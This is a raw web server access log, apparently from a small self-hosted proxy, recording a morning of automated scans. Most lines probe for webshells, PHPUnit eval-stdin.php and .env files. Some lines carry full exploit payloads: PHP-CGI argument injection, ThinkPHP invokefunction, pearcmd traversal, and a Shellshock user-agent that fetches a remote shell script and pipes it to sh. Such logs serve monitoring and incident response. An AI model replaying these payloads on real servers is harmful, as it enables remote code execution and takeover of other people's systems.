+[26/Jan/2026:05:39:17 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "//wp-content/themes/about.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:17 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/.trash7309/dd/" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:17 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/cache.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:18 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/ss.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:18 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/p.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:18 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "//wp-content/plugins/achdxhv/languages/admin.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:18 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "//user.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:18 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/wp-includes/block-patterns/" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:18 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "//index/function.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:19 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/wp.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:19 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/rip.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:19 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/wp4.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:19 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "//403.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:19 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "//wp-admin/maint/index.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:19 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/asd67.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:20 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "//sad/about.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:20 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/oivcl.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:20 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "//about.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:20 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "//wp-content/themes/deeto/login.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:20 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/v2.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:20 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "//wp-content/themes/hideo/network.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:21 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/x/" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:21 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "//.cache/x.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:21 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/dr.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:21 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/raw.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:21 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "//wp-includes/css/about.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:21 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "//wp-content/index.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:22 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/ioxi-o2.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:22 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/dropdown.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:22 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/dlu.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:22 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "//wp-content/about.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:22 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/db.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:22 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/packed.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:23 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/wp-configs.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:23 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "//404.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:23 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/des.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:23 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/.well-known/content.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:39:23 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "//lufix.php" [Client 4.194.107.19] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:05:46:43 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:05:56:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:05:59:00 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:06:02:17 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:06:07:55 +0000] 404 - GET http 91.82.215.191 "/actuator/health" [Client 20.106.32.192] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[26/Jan/2026:06:19:23 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 117.187.106.252] [Length 154] [Gzip -] "-" "-" +[26/Jan/2026:06:19:25 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 117.187.106.252] [Length 154] [Gzip -] "-" "-" +[26/Jan/2026:06:19:26 +0000] 404 - POST http 91.82.215.191 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:19:27 +0000] 405 - POST http 91.82.215.191 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 117.187.106.252] [Length 154] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:19:29 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:19:31 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:19:33 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:19:35 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:19:37 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:19:39 +0000] 404 - GET http 91.82.215.191 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:19:41 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:19:43 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:19:45 +0000] 404 - GET http 91.82.215.191 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:19:47 +0000] 404 - GET http 91.82.215.191 "/phpunit/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:19:49 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:19:51 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:19:53 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:19:55 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:19:57 +0000] 404 - GET http 91.82.215.191 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:19:59 +0000] 404 - GET http 91.82.215.191 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:01 +0000] 404 - GET http 91.82.215.191 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:03 +0000] 404 - GET http 91.82.215.191 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:05 +0000] 404 - GET http 91.82.215.191 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:06 +0000] 404 - GET http 91.82.215.191 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:08 +0000] 404 - GET http 91.82.215.191 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:10 +0000] 404 - GET http 91.82.215.191 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:12 +0000] 404 - GET http 91.82.215.191 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:14 +0000] 404 - GET http 91.82.215.191 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:16 +0000] 404 - GET http 91.82.215.191 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:19 +0000] 404 - GET http 91.82.215.191 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:21 +0000] 404 - GET http 91.82.215.191 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:23 +0000] 404 - GET http 91.82.215.191 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:25 +0000] 404 - GET http 91.82.215.191 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:26 +0000] 404 - GET http 91.82.215.191 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:28 +0000] 404 - GET http 91.82.215.191 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:30 +0000] 404 - GET http 91.82.215.191 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:32 +0000] 404 - GET http 91.82.215.191 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:34 +0000] 404 - GET http 91.82.215.191 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:36 +0000] 404 - GET http 91.82.215.191 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:38 +0000] 404 - GET http 91.82.215.191 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:40 +0000] 404 - GET http 91.82.215.191 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:42 +0000] 404 - GET http 91.82.215.191 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:44 +0000] 404 - GET http 91.82.215.191 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:46 +0000] 403 - GET http 91.82.215.191 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:48 +0000] 403 - GET http 91.82.215.191 "/index.php?lang=../../../../../../../../tmp/index1" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:50 +0000] 404 - GET http 91.82.215.191 "/containers/json" [Client 117.187.106.252] [Length 150] [Gzip -] "libredtail-http" "-" +[26/Jan/2026:06:20:59 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:06:24:06 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:06:31:12 +0000] 200 - GET http 91.82.215.191 "/" [Client 64.62.156.108] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15" "-" +[26/Jan/2026:06:32:07 +0000] 404 - GET http 91.82.215.191 "/webui/" [Client 64.62.156.108] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[26/Jan/2026:06:33:35 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[26/Jan/2026:06:34:10 +0000] 404 - GET http 91.82.215.191 "/geoserver/web/" [Client 64.62.156.108] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15" "-" +[26/Jan/2026:06:34:42 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:06:35:55 +0000] 200 - GET http 91.82.215.191 "/" [Client 18.159.36.33] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[26/Jan/2026:06:43:40 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:06:47:35 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:06:48:18 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:06:53:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:07:07:11 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:07:07:22 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:07:13:27 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:07:19:19 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[26/Jan/2026:07:24:32 +0000] 200 - GET http 91.82.215.191 "/?XDEBUG_SESSION_START=phpstorm" [Client 79.124.40.174] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:07:32:28 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:07:33:46 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:07:38:36 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:07:44:48 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:07:45:35 +0000] 200 - GET http 91.82.215.191 "/" [Client 3.90.60.247] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[26/Jan/2026:07:47:51 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:07:52:04 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:07:53:45 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:07:58:17 +0000] 400 - GET http 91.82.215.191 "/" [Client 3.130.96.91] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[26/Jan/2026:08:00:20 +0000] 400 - GET http 91.82.215.191 "/" [Client 3.130.96.91] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[26/Jan/2026:08:03:26 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:08:04:44 +0000] 400 - - http localhost "-" [Client 3.130.96.91] [Length 154] [Gzip -] "-" "-" +[26/Jan/2026:08:05:11 +0000] 400 - - http localhost "-" [Client 3.130.96.91] [Length 0] [Gzip -] "-" "-" +[26/Jan/2026:08:31:15 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:08:32:51 +0000] 400 - GET http 91.82.215.191 "/" [Client 185.12.59.118] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0" "-" +[26/Jan/2026:08:32:56 +0000] 200 - GET http 91.82.215.191 "/" [Client 135.233.112.103] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[26/Jan/2026:08:34:52 +0000] 404 - POST http 91.82.215.191 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[26/Jan/2026:08:34:52 +0000] 404 - GET http 91.82.215.191 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f7182e4%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f7182e4%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f7182e4%29%7Csh" [Client 192.159.99.95] [Length 0] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[26/Jan/2026:08:34:52 +0000] 404 - POST http 91.82.215.191 "/index.php?s=captcha" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[26/Jan/2026:08:34:52 +0000] 200 - GET http 91.82.215.191 "/" [Client 192.159.99.95] [Length 1033] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh?=\x5C6f7182e4||busybox wget -qO- http://41.231.37.153/rondo.qre.sh?=\x5C6f7182e4||curl -s http://41.231.37.153/rondo.qre.sh?=\x5C6f7182e4)|sh\x22& # rondo2012@atomicmail.io" "-" +[26/Jan/2026:08:34:52 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 192.159.99.95] [Length 154] [Gzip -] "-" "-" +[26/Jan/2026:08:35:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:08:37:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:08:39:41 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:08:42:08 +0000] 404 - GET http 91.82.215.191 "/actuator/gateway/routes" [Client 79.124.40.174] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:08:52:32 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:08:52:38 +0000] 404 - GET http 91.82.215.191 "/.env" [Client 95.164.5.48] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" 